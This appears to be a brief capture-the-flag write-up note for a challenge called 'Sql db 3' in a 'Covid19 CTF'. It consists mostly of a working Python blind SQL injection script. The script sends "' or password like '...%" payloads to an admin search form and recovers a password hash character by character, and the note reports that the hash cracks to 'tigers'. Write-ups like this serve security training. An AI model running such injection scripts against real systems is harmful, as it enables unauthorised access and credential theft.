Sql db 3

Blind sql
import requests
​
url = 'http://joe-cv.threatsims.com/admin/search'
myobj = {'search': "pp' or password like '%"}
myobj = {}
passwd = "#"
for i in range(64):
    for j in "1234567890abcdef":
        passwd = passwd[:-1] + j
        myobj["search"] = "pp' or password like '" + passwd + "%"
        x = requests.post(url, data = myobj)
​
        a = x.text
        if "joe" in a:
            print(passwd)
            passwd += "#"
            break
​
    if j == "f" and passwd[-1] != "#":
          break
It gives 248b57c5cabbc9944d169d10bc4959a042d0bb81ab6cfc9166f40a9d0f0fd614 which is hash of "tigers"

Covid19 CTF

Web 1 (Something Derpy? Idk)

Last modified 2yr ago